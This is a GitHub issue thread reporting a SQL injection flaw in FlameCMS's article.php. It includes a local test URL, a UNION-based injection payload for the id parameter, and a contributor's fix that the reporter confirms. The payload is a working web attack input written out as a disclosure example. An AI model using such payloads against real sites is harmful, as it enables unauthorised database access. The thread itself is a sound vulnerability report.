### ISSUE TITLE
sql injection vulnerability 

### ISSUE THREAD

**Issue by blackjliuyun** [FlameNET/FlameCMS#24]
hello
There is a sql injection vulnerability here：
FlameCMS-master/article.php 
<img width="748" alt="image" src="https://user-images.githubusercontent.com/23147261/66939882-80401000-f076-11e9-83dd-34efd426b518.png">

http://127.0.0.1:8888/FlameCMS-master/article?id=1
<img width="713" alt="image" src="https://user-images.githubusercontent.com/23147261/66940438-871b5280-f077-11e9-925d-9293c757740e.png">

payload:
id=-3521' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x7849574d434964786d6d53677a775679504d4e506c7563456d516b75474f634652545662506a5073,0x71767a6271),NULL,NULL-- auYF

**Comment by tlcd96** [comment]
thanks i'll solve it now, since there's no one else to solve it (not my repo)

**Comment by tlcd96** [comment]
Hi, can you check if it's solved now? a90be309b29902eac428a520a07fb0ef32d2a690

**Comment by blackjliuyun** [comment]
> Hi, can you check if it's solved now? [a90be30](https://github.com/FlameNET/FlameCMS/commit/a90be309b29902eac428a520a07fb0ef32d2a690)

Yes, this can be solved

**Comment by tlcd96** [comment]
thks
